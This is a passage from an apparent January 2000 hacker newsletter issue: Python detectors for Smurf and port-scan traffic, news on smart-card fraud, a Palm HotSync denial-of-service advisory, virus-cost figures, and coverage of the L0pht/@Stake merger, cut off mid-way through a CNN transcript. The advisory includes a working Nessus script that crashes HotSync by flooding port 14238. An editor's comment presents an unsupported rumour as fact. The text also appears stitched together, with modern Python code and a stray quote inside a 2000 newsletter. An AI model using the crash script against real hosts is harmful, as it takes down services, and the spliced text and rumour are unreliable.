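    the receiving end of a Smurf. Returns {victim: distinct_sources}."""
    sources = defaultdict(set)
    for r in records:
        if r["proto"] == "icmp" and r["detail"] == "echo-reply":
            sources[r["dst"]].add(r["src"])
    return {dst: len(s) for dst, s in sources.items() if len(s) >= threshold}


def port_scans(records, threshold=SCAN_PORTS):
    """One source sending SYNs to many ports on one host: reconnaissance.
    Returns {(src, dst): distinct_ports}."""
    ports = defaultdict(set)
    for r in records:
        if r["proto"] == "tcp" and r["detail"].endswith("/S"):
            ports[(r["src"], r["dst"])].add(int(r["detail"].split("/")[0]))
    return {k: len(v) for k, v in ports.items() if len(v) >= threshold}


def analyze(lines):
    """Run all three detectors over packet summary lines."""
    recs = [parse(line) for line in lines]
    return {"amplifier_abuse": amplifier_abuse(recs),
            "reply_floods": reply_floods(recs),
            "port_scans": port_scans(recs)}


def sample_lines():
    """Constructed traffic: one of each pattern plus a few benign packets."""
    lines = [f"{i} icmp 203.0.113.9 192.168.1.255 echo-request" for i in range(5)]
    lines += [f"{10 + i} icmp 198.51.100.{i + 1} 192.168.1.10 echo-reply"
              for i in range(25)]
    lines += [f"{40 + i} tcp 198.51.100.200 192.168.1.20 {20 + i}/S"
              for i in range(12)]
    lines += ["60 tcp 192.168.1.30 192.168.1.20 80/S",
              "61 icmp 192.168.1.30 192.168.1.20 echo-request",
              "62 icmp 192.168.1.20 192.168.1.30 echo-reply"]
    return lines


if __name__ == "__main__":
    for name, finding in analyze(sample_lines()).items():
        print(name, finding)
```

Detection is only half of it. The amplifier role goes away once border routers stop forwarding directed broadcasts (on Cisco IOS that is `no ip directed-broadcast` on each interface), and the spoofed-source half is what ingress filtering of source addresses at the provider edge (RFC 2267) exists to remove; a site that does both cannot be one of the 2000 reflectors the Oz.net item describes.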
"If you get into that server you can go anywhere in the installation," Brouillette said, breathing a sigh of relief now that 2000 is well under way and his servers are intact.

@HWA

44.0 HNN: Jan 24: French smart card expert goes to trial
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by sian
An expert in smart card technology has been arrested and faces up to seven years in jail, and a fine of £500,000 after he designed a fake smart card that could be used to defraud 'any cash terminal'. Serge Humpich then offered the spoofed card to French banks in exchange for £20 million. The banks accused him of blackmail.

The UK Register
http://www.theregister.co.uk/000123-000005.html

(using some sucky html that fucks up c&p)

@HWA

45.0 HNN: Jan 24: Palm HotSync Manager is Vulnerable to DoS Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by kingpin
We don't usually cover individual security vulnerabilities here at HNN but this one is interesting. The Palm HotSync Manager is vulnerable to DoS attack which may also crash the system and possibly allow the execution of arbitrary code. Anyone who runs HotSync Manager over the network is a potential target of attack.

Beyond-Security's SecuriTeam
http://www.securiteam.com/exploits/Palm_HotSync_Manager_is_vulnerable_to_Denial_of_Service_attack.html

Title
Palm HotSync Manager is vulnerable to Denial of Service attack

Summary
HotSync Manager provides network synchronization between the Palm Desktop and a remote Palm PDA that is connected via the Internet. This feature is used to backup the information from the Palm PDA to a secure location. However, using HotSync Manager over the network exposes it to an attack, where anyone with network connection to the station running HotSync Manager can crash the application and possibly execute arbitrary code.
Details

Vulnerable systems:
HotSync Manager 3.0.4 under Windows 98

Non vulnerable systems:
HotSync Manager 3.0.4 under Windows 2000

Exploit:
By connecting to the HotSync Manager's TCP listening port (TCP port 14238), and sending a large amount of data followed by a newline, it is possible to crash the HotSync Manager.

The following Nessus Plugin can be used to test this:

#
# This script was written by Noam Rathaus
#
# See the Nessus Scripts License for details
#
#
if(description)
{
  name["english"] = "HotSync Manager Denial of Service attack";
  script_name(english:name["english"]);
  desc["english"] = "It is possible to cause HotSync Manager to crash by sending
a few bytes of garbage into its listening port TCP 14238.

Solution: Block those ports from outside communication
Risk factor : Low";
  script_description(english:desc["english"]);
  summary["english"] = "HotSync Manager Denial of Service attack";
  script_summary(english:summary["english"]);
  script_category(ACT_DENIAL);
  script_copyright(english:"This script is Copyright (C) 1999 SecuriTeam");
  family["english"] = "Windows";
  script_family(english:family["english"]);
  exit(0);
}

#
# The script code starts here
#
if (get_port_state(14238))
{
  sock14238 = open_sock_tcp(14238);
  if (sock14238)
  {
    # 4096 bytes of filler followed by a newline, then give the service
    # a few seconds to fall over before re-checking the port.
    data_raw = crap(4096) + string("\n");
    send(socket:sock14238, data:data_raw);
    close(sock14238);
    sleep(5);
    sock14238_sec = open_sock_tcp(14238);
    if (sock14238_sec)
    {
      # Still accepting connections: report the exposure, not a crash.
      security_warning(port:14238, data:"HotSync Manager port is open.");
      close(sock14238_sec);
    }
    else
    {
      # Port no longer answers: the service went down.
      security_hole(port:14238);
    }
  }
}

Additional information
3Com's Palm computing team is aware of the problem and will fix this issue in the next release of the HotSync Manager.
@HWA

46.0 HNN: Jan 24: Viruses Cost the World $12.1 Billion
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

HWA Comment: I'll say this as a RUMOUR or MYTH in order to avoid possible libel charges but it was a well known fact that certain (very well known and established) Anti-Virus vendor(s) ran underground BBS's (dial up bulletin boards) in the 80's and later special backdoored FTP sites in the 90's for the purpose of virus authors to upload new viruses to be deployed into the wild so that the AV companies could capitalize on these new 'threats'....so when I read about costs like this I really wonder how much was premeditated by the AV companies themselves in order to make a buck from susceptible companies and people that refused to practice safe computing....trust no one, except maybe AVP. You can debate this if you like but I know it is fact, I was there and had access to these sites. - (HWA Trusted source)

From HNN http://www.hackernews.com/

contributed by nvirb
According to a recent study conducted by Computer Economics, a California based computer consulting firm, the world spent $12.1 billion last year in a war against malicious self replicating code. The $12.1 Billion figure is based on lost productivity, network downtime and the expense involved in getting rid of the virus. (Hmmmm, that number seems ridiculously large.)

APB News
http://www.apbnews.com/newscenter/internetcrime/2000/01/20/virus0120_01.html

Computer Viruses Cost $12 Billion in 1999
Report Tallies Business Impact of 'Economic Terrorism'

Jan. 20, 2000

By David Noack

CARLSBAD, Calif. (APBnews.com) -- Businesses around the world spent $12.1 billion last year in a war against "economic terrorism" in the form of malicious computer viruses, according to a new study.

Computer Economics, a computer consulting firm here, has found that the economic impact of virus attacks on information systems around the world is taking a heavy financial toll on business.
For the most part, computer security concerns have focused on hackers trying to gain entry into a company's computer system, rifling through files and possibly stealing sensitive and confidential information. But viruses, especially those delivered in e-mail, are giving corporate information technology managers something new to worry about.

Lost productivity and downtime

Samir Bhavnani, the analyst with Computer Economics who conducted the study, said the $12.1 billion is based on lost productivity, network downtime and the expense involved in getting rid of the virus.

"This form of economic terrorism is growing as viruses are no longer the minor annoyances that they were a few years ago," Bhavnani said. "Now they can verge on the catastrophic and cause major predicaments for any organization."

He said for the first six months of last year, financial losses caused by computer viruses totaled $7.6 billion.

Bhavnani said that companies must devote time to teaching their employees "prudent workstation use."

Delivery began to change

"Simple things like refraining from downloading unnecessary and non-work-related items from the Internet, opening executable files sent via e-mail or frequenting pornographic Web sites will increase the security level and reduce the vulnerability of valuable corporate resources," Bhavnani said.

A survey conducted last year by Information Security magazine asked information technology managers where they experienced the most security breaches. Seventy-seven percent said computer viruses were the No. 1 problem, followed by unauthorized access by employees and hackers and the theft and destruction of computing resources.

Last year, a series of malicious viruses clogged e-mail networks, crashed computers and erased hard drives. The way that viruses are delivered began to change. The "Bubbleboy" virus was activated when unsuspecting users opened an infected e-mail.
In the past, computer viruses were spread through attachments, and e-mail was generally regarded as safe.

'High-profile damage'

With computer virus alerts coming sometimes on a daily basis, security experts say that businesses are still not taking virus prevention seriously.

"Despite all of the high-profile damage caused by viruses, organizations are still just beginning to implement adequate security plans," said Michael Erbschloe, vice president of research at Computer Economics. "Additionally, many firms are reluctant to report damages because they feel they may be identified as an easy target."

The study says that in the past three years there has been a major programming shift as viruses have become far more malicious and are designed specifically for destruction and damage.

The study said that computer viruses were initially designed to create a minor annoyance. Now they are very complex and come in a multitude of forms, and many are polymorphic, which means they change while in a computer to avoid detection from anti-virus software.

Melissa and Explorer encouraged copycats

"The Melissa and Explorer.zip viruses acted as a catalyst in 1999," said Erbschloe. "Organizations started to realize the severity and the malicious intent of most new computer viruses and began to take the cries for increased security spending more seriously."

Steven Ross, a director at Deloitte & Touche's Enterprise Risk Services Practices, said computer viruses are having a noticeable impact on companies.

"The first wave of viruses 10 years ago attacked at the operating system level. The ones we see today are attacking at the application level. The filters that come into play when you boot up aren't necessarily capturing the things that are happening at the application level," said Ross.

He said there may only be a handful of smart computer virus writers, and that there are hundreds and thousands of so-called script kiddies who when taught to program a virus can do so without much effort.
Writers rely on 'general complacency'

"There is also a general complacency. ... They are absolutely counting on it," said Ross.

He cited an example of removing 7,500 viruses from a number of servers for a company. When he returned the next week, there were 1,500 more viruses.

Dan Schrader, vice president of new technology at Trend Micro, an anti-virus software company in Silicon Valley, said the $12.1 billion figure is "conceivable," and "I am not at all surprised by that number."

"If you want to label what the year [1999] was in technology, the first label would be the year of the IPO, and the second label would be the year of the computer virus. There were more serious computer virus outbreaks in any one month of last year than we've had virtually in the entire history of computing," said Schrader.

He said there was "tremendous innovation" among computer virus writers, and for the first time the virus writers got it that it's "all about the Internet."

"There is lost data, lost productivity while you wait for the tech guy to come around, and then there's the e-mail systems being shut down," Schrader said. "One of the more common ways for companies to respond to news of a new virus outbreak is to do a pre-emptive shutdown of their e-mail system. ... It's the main way that computer viruses are spread."

David Noack is an APBnews.com staff writer (david.noack@apbnews.com)

@HWA

47.0 HNN: Jan 24: L0pht and @Stake Create Controversy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Someone gets a grant or has a merger with a commercial company and suddenly they have "SOLD OUT", become "NARQS" or the like. Pure BS. The l0pht is long overdue its break in the security field, so just chill and let them do their thang; you're just jealous you ain't got what it takes to make the grade yourself.
- Ed

From HNN http://www.hackernews.com/

contributed by Weld Pond

The recent merger of the hacker think tank L0pht Heavy Industries with security services company @Stake has created an immense buzz within the industry. Unfortunately some journalists (well one actually) don't seem to get it and have published some potentially libelous comments regarding the merger.

ZD Net
http://www.zdnet.com/pcweek/stories/news/0,4153,2420340,00.html

Other writers seem to have more legitimate concerns but it is still obvious that they have not done their research.

ZD Net
http://www.zdnet.com/pcweek/stories/columns/0,4351,2421254,00.html

And still others actually seem to understand.

Boston Herald
http://www.bostonherald.com/bostonherald/life/net01182000.htm

CNN
http://cnn.com/TRANSCRIPTS/0001/22/stc.00.html

ABC News
http://abcnews.go.com/onair/dailynews/wkn_000122_netsecurity.html

ZDNet #1;

--------------------------------------------------------------
This story was printed from PC Week,
located at http://www.zdnet.com/pcweek.
--------------------------------------------------------------

It gets really scary when hackers join security firms

By John Taschek, PC Week
January 16, 2000 9:00 PM PT
URL:

It's shaping up to be an interesting year, which in some cultures is not necessarily a good thing. First, Lotus President Jeff Papows resigns, though I'm not sure I believe anything from Papows anymore. Then Steve Jobs takes full control over at Apple, which will, of course, trigger a huge sell-off at Apple because, as everyone knows, Jobs works best when he's a front-seat driver with a back-seat title. Then China reportedly bans Windows 2000, presumably so that the country could develop an indigenous operating system based on Linux. (The Chinese government denied the report.)

But by far the oddest thing to happen is that the hackers (or, as the fundamentalist technologists say, crackers) who went by the name L0pht Heavy Industries have now become full-scale security consultants.
Does this bode ill for the nation's security, or what? Is everyone off their rocker? I can't believe what I'm reading. I also can't believe I'm writing about it, since dealing with people who have exhibited criminal tendencies is not a business I want to be in.

L0pht was a highly publicized group of hackers who started out cracking security systems and then, somewhere along the line, became somewhat legitimate because they began to document what they were doing on the L0pht.com Web site. L0pht also develops software that allows users to crack operating system passwords in a matter of hours.

To get an idea how strange it is for a security firm to hire L0pht personnel, you only need to look at the Attrition.org Web site, which highlights L0pht. Attrition's motto is, "We're easy to get along with once you learn to worship us."

More damning is that L0pht has also gone on record as saying that "governments and multinational corporations are detrimental to the personal liberties on the Internet."

On the other hand, L0pht's new company, called @Stake, is a specialized professional services company that will provide a full range of security solutions for the e-commerce operations of global clients.

This is clearly an example of the farmer giving the fox the key to the chicken coop. I can't imagine that any legitimate startup would actually seek out L0pht. But that's exactly what has happened, as executives from Forrester Research, Cambridge Technology Partners and Compaq formed @Stake specifically to provide security services to its clients.

Lo and behold, the vice president of R&D at @Stake is none other than Professor Mudge, the chief scientist at L0pht. I can just imagine Mudge hacking and cracking to his heart's content, simply to find weaknesses at those multinational companies, which then would become @Stake's new customers.
Of course, the tired old argument is that L0pht performs a service by detailing flaws in systems so that companies can boost their defenses against a real, and more threatening, hacker. Hogwash, poppycock and every other early-20th-century declarative.

L0pht comprised many extremely bright and talented people, and Mudge might have been the smartest of the bunch. But L0pht's history shows that the group is not ethical, maintained practices that bordered on being illegal and is simply downright scary. I wouldn't want any organization that hired the brain trust of L0pht as my security consultant.

See @Stake's response to John Taschek's column.

Is it better to join them if you can't beat them? Write me at john_taschek@zd.com.

I encourage you to DO write him and respond to this article but do so politely, expletives and leet talk will just make us look worse and prove his point. - Ed

-=-

ZDNet #2

--------------------------------------------------------------
This story was printed from PC Week,
located at http://www.zdnet.com/pcweek.
--------------------------------------------------------------

L0pht-@Stake pact: Going legit, selling out or both?

By Michael Caton, PC Week
January 16, 2000 9:00 PM PT
URL: http://www.zdnet.com/pcweek/stories/columns/0,4351,2421254,00.html

What bothers me the most about security specialist L0pht Heavy Industries becoming part of @Stake isn't the idea of hiring hackers. It's the idea that L0pht's great, free public service is now very much for hire.

The trend in the industry has been to give away, or at least subsidize with advertising, some beneficial IT resources. I can think of at least a half-dozen free IT help sites that eventually hope to make money through advertising or e-commerce. Access to security information is moving in the other direction, however, entirely because there is so much demand and so few security experts.
L0pht has been a thorn in the side of many vendors; a quick look at its Web page reveals a great tweak of Microsoft. L0pht has been known to really embarrass vendors that have not moved quickly enough to address the security holes the group finds. Access to most of the information has been free—or, according to the L0pht site, "so that system administrators, users, and software and hardware vendors may benefit from our knowledge, we share some of it with you."

In the past, "some" could have meant that L0pht held information back to protect us all from the less scrupulous, but now it could be held back to help @Stake maintain a competitive advantage when consulting. Talk about unscrupulous.

What will be as interesting will be to see how this security-for-hire model plays out when it comes to companies such as @Stake maintaining a competitive advantage. By going fully legit and for-profit, this could compromise relationships with hacking sources. When a security expert or hacker finds a new exploit, is the rush going to be to share it with anyone? Not if someone else is going to make money off it or hold it as confidential information to have a competitive advantage. Perhaps image and rhetoric can maintain enough good will to keep sources alive, although I'm not so sure an anarchist's mantra will convince too many people when a company's analysts bill out in the tens of thousands of dollars per week.

In an industry where the nondisclosure agreement is as important as the business contract, I wonder just how well the hacking community will disclose security holes it finds when under contract to vendors. Let's face it: IT consulting companies aren't the only ones hiring hackers. Security skills can be as useful for product development as for product deployment. Hopefully, as @Stake contracts out to vendors, it has an escape clause that allows it to disclose security flaws after a certain number of business days, just to keep the vendors honest.
While it is possible that L0pht will survive in spirit, the @Stake Web site has all the polish of the best up-and-coming dot-com company looking to strike gold. Retaining the anti-establishment spirit would certainly keep it in the good graces of its sources.

Do you think good security info will be held hostage to profits in the future? Write me at michael_caton@zd.com.

-=-

Boston Herald;

Cutting to the chase: Hackers join forces with security firm to keep the world safe

Net Life/Stephanie Schorow
Tuesday, January 18, 2000

Which is a more revealing story? That in December a hacker calling himself Maxim broke into a server at an on-line CD store and obtained thousands of credit card numbers? Or that when Maxim posted those numbers on a Web site from which visitors could get them, one at a time, thousands reportedly did so?

Must we beware the hacker in the machine - or the hacker next door?

First, a look at the word ``hacker'' - it's not a synonym for ``criminal,'' just as not every locksmith is a burglar, as one hacker told me. A hacker cracks software codes to get into a company's network or Web page for the thrill of beating the system, not necessarily to cause mischief.

But the movie ``War Games'' transformed a bit of MIT slang for a guy who likes to create computers into a term for someone who wants to destroy them. In popular culture, the Evil Genius Hacker has joined the Mad Scientist and Megalomaniac Who Wants to Rule the World as a standard stereotype. Fox Mulder of TV's ``The X-Files'' could not chase his aliens without illegal hacking help from the so-ugly-they're-cute Lone Gunmen, Good Guy Hackers. Hackers get a total makeover into leather-coated chic in ``The Matrix.''

But such stereotypes don't hold up in real life.
The most recent Def Con - the hackers' annual meet-and-defeat confab - had, according to one on-line report, ``all the corporate professionalism of a computer mainstream industry.'' Activists, calling themselves ``white hat hackers,'' have formed a group dedicated to hacking into and shutting down kiddie-porn sites.

And just two weeks ago, the famed Boston-area hacker collective - known as the LOpht - announced its merger with a start-up security company, @Stake. With founders hailing from Compaq and Forrester Research, plus $10 million in venture capital, @Stake is pure pinstripe. At LOpht, geek rules.

The news intrigued me. For years, I'd heard about LOpht's expertise, its Web postings of key security flaws in Windows-based systems, about its outlaws-in-good-standing image with the so-called black hat hacker underground, and about their gizmo- and Cheez-Its-clogged warehouse. Going by hacker handles of Mudge, Dildog and Space Rogue, they've testified on lax computer security before the U.S. Senate. They embodied Bob Dylan's phrase: ``to live outside the law, you must be honest.''

When the hacker who goes only by ``Mudge'' returned my call, his voice was more lighthearted than mysterious. For a guy who supposedly has the ability to take down the Internet in 30 minutes, he was cheerfully patient with a fumbling reporter's Hacking 101 questions.

What enticed LOpht to come in from the cold? Well, money, for one thing; ``we'd been looking around for various ways to get the LOpht to fund itself,'' said Mudge. With @Stake's pledge not to market any specific security product, take kickbacks from vendors or interfere with LOpht's continued posting of security flaws, LOpht will be able to remain the hacker's Consumer Reports, Mudge said.

LOpht's independence is invaluable to @Stake, said Ted Julian, @Stake founder and vice president of marketing: ``There's an enormous demand in the marketplace for these people.''

That's because computer security itself is transforming.
As Mudge said, ``We know how to make a closed system.'' Put up a fire wall and keep people out. But with burgeoning e-commerce, systems have to remain open enough to allow consumers access to key information. Users, for example, might want to search inventories or track a delivery. Yes, Mudge asserted, ``you absolutely can'' secure such systems. You just need the right tools.

Attorney General Janet Reno's recent call for a national anti-cybercrime network underscores the need for enhanced security.

Hacking is changing, too. Once the domain of code-writing uber-nerds, it's been invaded by so-called script kiddies, young neophytes who attack with a point and click. ``The media actually encourages them,'' Mudge said, disgustedly. ``If you read about someone breaking into a high profile Web page, it's `a 16-year-old, brilliant misguided kid.' If a 16-year-old walked into a liquor store, shot the clerk to get the money, they never say, a `brilliant juvenile expert in spontaneous combustion.' ''

For me, the most telling aspect of the Maxim hack was that afterwards no one I knew - even those who blew big bucks shopping the dotcoms - seemed spooked about e-shopping. Perhaps we've accepted a certain level of e-commerce risk. Consider: thousands of traffic accidents occur daily, but we wouldn't ban driving. We just want to keep the 16-year-old drivers under control. And we want safer roads.

Which makes me glad that the LOpht is still out there.

-=-

CNN;

Science and Technology Week

Pentagon Goes Ballistic With New Defense Tests; Group of Hackers Goes Corporate; Winds of Change Stir Up New Developments in Weather

Aired January 22, 2000 - 1:30 p.m. ET

THIS IS A RUSH TRANSCRIPT. THIS COPY MAY NOT BE IN ITS FINAL FORM AND MAY BE UPDATED.

RICK LOCKRIDGE, GUEST HOST: The Pentagon goes ballistic with new defense tests, a secretive group of computer hackers goes corporate, and the winds of change stir up new developments in weather.
Those stories and more are just ahead on SCIENCE & TECHNOLOGY WEEK.

Hello and welcome. I'm Rick Lockridge in for Ann Kellan.

A test of a new high-tech U.S. defense system ended in failure this past week. A prototype Interceptor, designed to knock out approaching missiles, apparently sailed right past its target. Pentagon experts think they've figured out what went wrong. But as Jamie McIntyre reports, the failure is raising questions about the whole program.

(BEGIN VIDEOTAPE)

JAMIE MCINTYRE, CNN MILITARY AFFAIRS CORRESPONDENT (voice-over): From the launch of a target missile at night in California through the launch of an Interceptor from a sunny Pacific island, Pentagon rocket scientists thought they were looking at a slam dunk. Everything was tracking perfectly. But as they counted down to an expected mid-space collision, nothing, no flash: nothing but black space. They missed.

In reconstructing the failure, Pentagon officials say they believe heat sensors the Interceptor uses to find the warm warhead failed in the crucial final six seconds. Why they don't yet know. It was a bitter disappointment after October's successful maiden test, but the Clinton administration vowed to press on, insisting some misses were inevitable.

JOE LOCKHART, WHITE HOUSE PRESS SECRETARY: Obviously, if this were easy technology, they wouldn't have to test. They'd just go ahead and deploy.

MCINTYRE: The $100 million test was the second of 19 planned tests of a system designed to protect the United States from a limited missile attack by a rogue nation. But only one more test is planned in the spring before the Pentagon recommends whether to invest billions more for deployment of the system by 2005. Critics insist the failure is a wake-up call that the complex missile shield is not ready for primetime.

TOM COLLINA, UNION OF CONCERNED SCIENTISTS: I would say it's just another piece of evidence that's showing that you can't make a decision this summer, that the system's moving too fast.
MCINTYRE (on camera): The Pentagon, stung by criticism that it may have overstated its previous success, went to great lengths this time to explain exactly what went wrong. And while insisting it can solve the technical problems, a senior military official admitted the test schedule may be overly ambitious.

Jamie McIntyre, CNN, the Pentagon.

(END VIDEOTAPE)

LOCKRIDGE: NASA made it official this week. The Mars Polar Lander is dead. The spacecraft was designed to study the Martian atmosphere and dig up soil samples. It was due to land on Mars on December 3. But just before it entered the Martian atmosphere, it stopped sending data back to Earth, and it hasn't been heard from since. One final attempt to contact it this past week met with silence. Scientists say the Polar Lander may have burned up as it descended, or it may have crashed on Mars, but they'll probably never know for sure. Two panels investigating the failure are due to report in March.

Coming up later in the show: dolphins stranded in the shallows, and the rescue effort that helped turn things around. But first, some underground computer hackers surface to show what's at stake when you're online.

(COMMERCIAL BREAK)

LOCKRIDGE: A mysterious hacker group that's legendary in some Internet circles is going mainstream. The Boston-based group, called Lopht, is starting a company to advise big business on computer security. Our reporter Ann Kellan has known members of Lopht for two years now, and wonders if the new corporate ties will change their lofty goals.

(BEGIN VIDEOTAPE)

"MUDGE", LOPHT MEMBER: We decided Lopht is now going to completely sell out, and we are going to join the mainstream.

ANN KELLAN, CNN CORRESPONDENT: He gives keynote speeches to packed houses...

"MUDGE": If you're looking for computer security, then the Internet is not the place to be.

KELLAN: ... is invited, along with fellow group members, to testify before the U.S. Senate. He's a trained musician, and plays a mean guitar.
He goes by the handle "Mudge," won't reveal his name, rank or Social Security number...

"MUDGE": I don't have to worry about, you know, who's waiting outside of my house when I leave in the morning.

KELLAN: ... and has been a member of a band of computer hackers called Lopht since 1992.

UNIDENTIFIED MALE: Seven people, close quarters, on top of each other -- it's amazing that we can actually get along without being at each others' throats.

KELLAN: Headquartered in a secret warehouse near Boston, the Lopht is filled with hand-me-down equipment. Even the bathroom is wired.

"WELD POND," LOPHT MEMBER: Here's our bathroom. Normally, a bathroom wouldn't be very exciting, but our bathroom has a Web browser.

KELLAN: There are processors and networks, from Novell to Microsoft.

UNIDENTIFIED MALE: We got it from dumpsters. We got it as, you know, people give equipment to us.

KELLAN: And once they own it, they legally attack it, learning how each system works, inside and out.

"WELD POND": We don't just attack Microsoft, no matter what, you know, Microsoft might say.

KELLAN: Each member has an area of expertise. "Weld Pond," programmer and Web guru. "Brian Oblivion" knows networks. "Silicosis (ph)" deciphers network codes. "Space Rogue" knows the inner workings of Macintosh computers. He also publishes a daily hacker newsletter on the Web.

"SPACE ROGUE," LOPHT MEMBER: There are a lot of things that go on that affect the hacker culture and the people that are in the hacker community that don't really get reported in the mainstream.

KELLAN: "Kingpin" is a hardware expert, started hacking when he was 7, not always legally. He says Lopht helped set him straight.

"KINGPIN," LOPHT MEMBER: I got into trouble for some things when I was younger, and they basically took me under their wing. They must have thought I had some good in me.

UNIDENTIFIED MALE: Still do; we're just still trying to find it.

KELLAN: "Dill Dog" is an ace programmer.
Before joining Lopht, he made headlines in another hacker group, developing software that lets people access computers from remote locations, for good or for bad. It ticked off the likes of Microsoft, but if a system is vulnerable, Lopht's philosophy is to go public with it.

"MUDGE": If you don't bring it public and if you just hand information off to the offending company, they just want to bury it, because it's cheaper for them to do that.

KELLAN: Considered by many the consumer advocates of the computer world.

"KINGPIN": We know the computer industry is here to stay, and we want to make security better. We want to make the industry better.

KELLAN: In the hacker world, blue hairs mingle with crew cuts and criminals with feds, the cops and robbers attend the same conventions, to learn from each other -- where computer vulnerabilities are, where thieves can break in and steal everything, from bank accounts to medical records.

KELLAN (on camera): How vulnerable are all the systems out there?

(LAUGHTER)

UNIDENTIFIED MALE: Toys can be hacked.

KELLAN (voice-over): The Lopht has been an exclusive hacker playground. And now this band of hackers is going corporate, moving to white-walled offices, getting money to buy new equipment, a place where they can do more good, says "Mudge." As far as their old stomping grounds...

"MUDGE": The luxurious labs will still exist there for some time, I'm sure, but...

UNIDENTIFIED MALE: We still can't tell you where it is.

"MUDGE": Even the Lopht folks are sitting there going, we love this place, but boy, we can make something so much better.

KELLAN: The move is good, and he'll stay casual and keep his personal life private, he says. But will success change Lopht's goals?

UNIDENTIFIED MALE: One thing we always said about Lopht, if it stops being fun, then it's not Lopht, then it's work.

"KINGPIN": It's just so wonderful to figure out how the world works around you, and especially when it doesn't.
UNIDENTIFIED MALE: It is a family, that's what it is.

KELLAN: For SCIENCE & TECHNOLOGY WEEK, this is Ann Kellan.

(END VIDEOTAPE)

LOCKRIDGE: The Lopht members say their security expertise is particularly needed in the field of e-commerce. They see a conflict there between protecting data and the need to make Web sites very easy and welcoming for cyber-shoppers. But, says one of their new corporate partners, "If you can't do security right, you can't do e-commerce right." "Mudge" agrees, and says security should no longer be just walls built to keep people out, but an element that makes everyone's job easier, from the warehouse to the delivery company to the customer.

Coming up: from climate patterns to better weather detection, we'll tell you what's making waves.

(COMMERCIAL BREAK)

LOCKRIDGE: Some climate researchers think there's a big change going on in the Pacific Ocean that could bring weird weather for the next 30 years. They say unusual areas of warm and cold water may mean we're entering a pattern called the Pacific Decadal Oscillation, which changes weather around the world. Anne McDermott has more.

(BEGIN VIDEOTAPE)

ANNE MCDERMOTT, CNN CORRESPONDENT (voice-over): Painting the lawn: Another wacky California custom? Well, no. This was back in the late '80s, when a drought burned up all the grass. Eventually, though, the vegetable dye was washed away by El Nino. But it may be time to get out that green dye again, because according to the experts, more drought is on the way. And that's because of a natural recurring climate pattern over the Pacific Ocean called Pacific Decadal Oscillation, or PDO for short. Unlike El Nino, which only sticks around a year or two, PDO is a much bigger phenomenon, and one that waxes and wanes over the course of 20 to 30 years.
Scientists monitoring this PDO say it steers the jet stream over North America and will result, they say, in lots more rain in the Northwest part of the United States and less than normal rainfall in the Southern part of the country.

WILLIAM PATZERT, JPL OCEANOGRAPHER: When the Pacific speaks with events like this, Pacific Decadal Oscillation, the United States definitely listens.

MCDERMOTT: How severe droughts will be is by no means possible to determine, but expect a renewed interest in those low-flow showerheads and those water-skimping toilets. No one's forgotten rationing or the sacrifices.

UNIDENTIFIED MALE: Not being able to wash down my driveway and wash my car.

MCDERMOTT: Now this PDO is not related to global warming, but its reach may be global. Scientists say it's possible that the PDO played a part in the terrible flooding in Venezuela last year and in those wind storms that battered Europe late last month. But mostly, this climate pattern will affect the U.S. In fact, it's already happening. Scientists say New England's long wait for that first big snow is related to the PDO. Next up: well, at least some periods of drought in some parts of the country, though it's unlikely it'll make anyone yearn for the return of El Nino.

For SCIENCE & TECHNOLOGY WEEK, I'm Anne McDermott, CNN, Los Angeles.

(END VIDEOTAPE)

LOCKRIDGE: If we're going to have strange weather in the next few years, at least forecasters may be able to give us a bit more warning of what's coming. The National Weather Service has a brand new computer, and officials say it will make predictions faster and more accurate. Natalie Pawelski reports.

(BEGIN VIDEOTAPE)

NATALIE PAWELSKI, CNN CORRESPONDENT (voice-over): Predicting this week's snowstorms and bitter cold and forecasting the hurricanes and tornadoes of warmer months has just gotten easier, says the National Weather Service, thanks to a new supercomputer.
JACK KELLY, NATIONAL WEATHER SERVICE: We're starting off today with a much -- a five-times-faster computer than we've had, and by September, it will be about 28-times faster than the one we currently have. So we're able to do better simulations of the atmosphere.

PAWELSKI: The Weather Service says the new computer will give people more lead time to prepare for severe storms, and it's designed to run increasingly-complex forecasting models that predict what's coming with ever-greater detail.

KELLY: What's that mean for everyone? It means more accurate forecasts, longer-time forecasts and more accurate, both temperature, rain, you name it; it's going to be better than what we've been able to do.

PAWELSKI: They say everybody talks about the weather but nobody does anything about it. The new computer should allow people to talk about coming weather further in advance. And while we still can't do anything about it, at least we can be better prepared.

For SCIENCE & TECHNOLOGY WEEK, I'm Natalie Pawelski.

(END VIDEOTAPE)

LOCKRIDGE: Coming up next: surfing the Web and the water. We'll travel to Florida for a marine mammal mystery, then introduce you to an older generation learning some new technology.

(COMMERCIAL BREAK)

LOCKRIDGE: Skywatchers with clear weather got a spectacular show on Thursday night. A total lunar eclipse made the full moon glow an eerie shade of red over North and South America. This was the first time in four years that the Sun, Earth and Moon lined up just right to produce this kind of show. It happens when the Earth's shadow blocks most of the Sun's rays from lighting up the Moon. The next full lunar eclipse will be in July, and the best viewing for that one will be from Asia and Australia.

Marine biologists in the Florida Keys are trying to solve a mystery. Starting last weekend, dozens of bottle-nosed dolphins began stranding themselves on tidal flats.
They included both healthy and sick animals, and scientists are trying to figure out just what drove them so close to shore. Reporter Mike Tobin, from our affiliate WSVN, has the story.

(BEGIN VIDEOTAPE)

MIKE TOBIN, WSVN REPORTER: Hours and hours of desperate, exhaustive labor got rescuers to the point where they finally chased the dolphin out into open water.

CHRIS BLANKENSHIP, MARINE BIOLOGIST: It's nice to see him go offshore, but whether they get stranded again, we don't know.

TOBIN: Without warning, dolphins started coming ashore, not just on Long Key, but on the west coast of Florida. These dolphins ran aground at Aresnicker (ph) Bank, about five miles off Long Key. So necropsies are being performed on all the dolphin that died to see if there was an illness or toxin which caused this.

BRAD LANGE, LAYTON, FLORIDA FIRE DEPARTMENT: Something's obviously going on. Right now, we're checking dolphins out, and hopefully we'll know more later on.

TOBIN: There were two efforts going on in the water, one to nurse the ill, exhausted or injured back into swimming shape, and two, to scare the healthy dolphin into the open sea, but the first attempts at human chains were unsuccessful. The healthy dolphin kept coming back. Then someone came up with a theory that this was a tightly knit pod of dolphin, and the sick ones were calling for help.

